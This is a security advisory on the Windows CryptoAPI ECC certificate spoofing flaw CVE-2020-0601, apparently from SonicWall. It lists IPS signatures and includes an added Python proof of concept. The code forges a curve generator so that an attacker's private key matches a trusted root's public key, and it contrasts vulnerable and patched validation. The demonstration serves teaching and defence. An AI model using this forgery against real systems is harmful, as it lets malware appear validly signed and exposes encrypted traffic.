Windows CryptoAPI Spoofing Vulnerability CVE-2020-0601

January 14, 2020

NSA discovered and reported to Microsoft a critical vulnerability affecting Microsoft Windows cryptographic functionality. A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates: when a certificate carries explicit ECC curve parameters, the affected code matches the certificate to a trusted root by public key alone and does not check that those parameters (in particular the generator point) are the trusted root's own. An attacker can therefore construct a certificate whose public key equals a trusted ECC root's key but whose private key the attacker controls. The vulnerability affects Windows 10 and Windows Server 2016/2019, as well as applications that rely on Windows for trust functionality.

Microsoft released a patch today, as part of its January 2020 security update, for the Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601) and urges everyone to update their systems as quickly as possible.

A successful exploit could allow the attacker to:
(1) Sign a malicious executable so that the file appears to come from a trusted, legitimate source; the digital signature would chain to a trusted provider, so neither the user nor an application checking signatures would have any indication that the file is malicious.
(2) Conduct man-in-the-middle attacks against TLS connections to the affected software and decrypt confidential information on those connections.
In both cases the forged certificate must impersonate a trusted certificate that itself uses an ECC key.
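The following is an added demonstration of why the spoof works and what the fix checks; it is example code written for this page, not code from SonicWall, NSA or Microsoft. It reproduces the key-equivalence trick on NIST P-256 in pure Python: an attacker who knows only the CA's public key Q picks a private key d' of their own and publishes the generator G' = d'^-1 * Q, so that d' * G' equals Q. A validator that compares only the public key (the pre-patch behaviour) accepts the forged certificate and verifies signatures made with d'; a validator that also compares the curve parameters rejects it. The CA private key, the attacker's key, the ECDSA nonce and the signed "file" are all constructed sample values, and the dictionaries stand in for the SubjectPublicKeyInfo of a real X.509 certificate.

```python
"""Added demonstration of the CVE-2020-0601 key-equivalence trick on P-256.

Example code for this page, not SonicWall, NSA or Microsoft code. All values
other than the standard P-256 domain parameters are constructed samples.
"""
import hashlib

# NIST P-256 domain parameters: field prime, curve coefficients, base point, order.
P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
A = P - 3
B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
G = (0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,
     0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5)
N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551


def on_curve(pt):
    """True if pt satisfies y^2 = x^3 + Ax + B over GF(P)."""
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0


def ec_add(p1, p2):
    """Affine point addition/doubling; None stands for the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:  # p2 == -p1
            return None
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, pt):
    """Scalar multiplication by double-and-add (not constant time; demo only)."""
    acc = None
    while k > 0:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc


def ecdsa_sign(d, gen, z, k):
    """Textbook ECDSA over generator `gen`; the nonce k must be secret and unique."""
    r = ec_mul(k, gen)[0] % N
    s = pow(k, -1, N) * (z + r * d) % N
    return r, s


def ecdsa_verify(q, gen, z, sig):
    """Verify sig on hash z under public key q, using whatever generator the cert claims."""
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    w = pow(s, -1, N)
    pt = ec_add(ec_mul(z * w % N, gen), ec_mul(r * w % N, q))
    return pt is not None and pt[0] % N == r


def forge_generator(ca_pub, d_fake):
    """Attacker step: choose G' so that d_fake * G' equals the trusted CA's public key."""
    return ec_mul(pow(d_fake, -1, N), ca_pub)


def vulnerable_key_match(cert, trusted):
    """Pre-patch behaviour: the certificate is matched to the root by public key alone."""
    return cert["pub"] == trusted["pub"]


def patched_key_match(cert, trusted):
    """Fixed behaviour: the curve parameters must equal the trusted root's as well."""
    return cert["pub"] == trusted["pub"] and cert["gen"] == trusted["gen"]


def run_demo():
    d_ca = 0x1D3C2B1A0F9E8D7C6B5A49382716051423321AB8  # constructed; never known to the attacker
    trusted = {"gen": G, "pub": ec_mul(d_ca, G)}  # what the root store holds (named curve)
    d_fake = 0xC0FFEE  # attacker's own private key (constructed)
    g_fake = forge_generator(trusted["pub"], d_fake)
    rogue = {"gen": g_fake, "pub": ec_mul(d_fake, g_fake)}  # forged cert with explicit params
    z = int.from_bytes(hashlib.sha256(b"malicious.exe (constructed sample)").digest(), "big")
    sig = ecdsa_sign(d_fake, g_fake, z, k=0xABCDEF0123456789)  # fixed nonce, demo only
    return {
        "pubkeys_equal": rogue["pub"] == trusted["pub"],
        "vulnerable_accepts": vulnerable_key_match(rogue, trusted),
        "patched_accepts": patched_key_match(rogue, trusted),
        "sig_verifies_with_cert_params": ecdsa_verify(trusted["pub"], g_fake, z, sig),
        "sig_verifies_with_real_params": ecdsa_verify(trusted["pub"], G, z, sig),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

Note that the forged generator is a perfectly valid point on P-256 (it is a multiple of G), so an "is the point on the curve" sanity check does not catch it; the only reliable check is to compare the certificate's parameters against those of the trusted root, or to reject explicit ECC parameters outright in favour of named curves.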

SonicWall Capture Labs Threat Research team provides protection against this vulnerability with the following signatures:
IPS 14728: Windows CryptoAPI Spoofing Vulnerability (JAN 20) 1
IPS 14729: Windows CryptoAPI Spoofing Vulnerability (JAN 20) 2
IPS 14730: Windows CryptoAPI Spoofing Vulnerability (JAN 20) 3
IPS 14731: Windows CryptoAPI Spoofing Vulnerability (JAN 20) 4